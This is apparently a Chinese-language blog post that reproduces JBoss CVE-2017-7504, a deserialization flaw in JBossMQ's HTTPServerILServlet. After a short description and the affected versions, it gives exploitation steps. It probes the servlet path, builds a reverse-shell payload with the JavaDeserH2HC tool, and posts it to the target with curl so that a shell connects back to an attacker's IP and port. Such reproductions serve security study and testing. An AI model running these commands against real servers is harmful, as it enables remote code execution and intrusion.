Jboss CVE-2017-7504

JBOSS CVE-2017-7504
漏洞复现
发布日期:   2021-07-05
更新日期:   2021-10-10
文章字数:   220
阅读时长:   1 分
阅读次数:  

[toc]

JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X

0x01漏洞描述

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

0x02影响版本

JBoss AS 4.x及之前版本

0x03漏洞利用

1、首先验证目标jboss是否存在此漏洞,直接访问
/jbossmq-httpil/HTTPServerILServlet 路径下。若访问200或下载,则可能存在漏洞。

此处我们使用JavaDeserH2HC工具来利用该漏洞,尝试直接弹回一个shell
注意:这个工具在linux系统使用

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 反弹的IP:端口
curl http://目标IP:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ReverseShellCommonsCollectionsHashMap.ser

端口监听:

反弹shell成功

文章作者: Taoing
文章链接: http://Ta0ing.github.io/article/45a5e5d3.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Taoing !
JBOSS CVE-2017-7504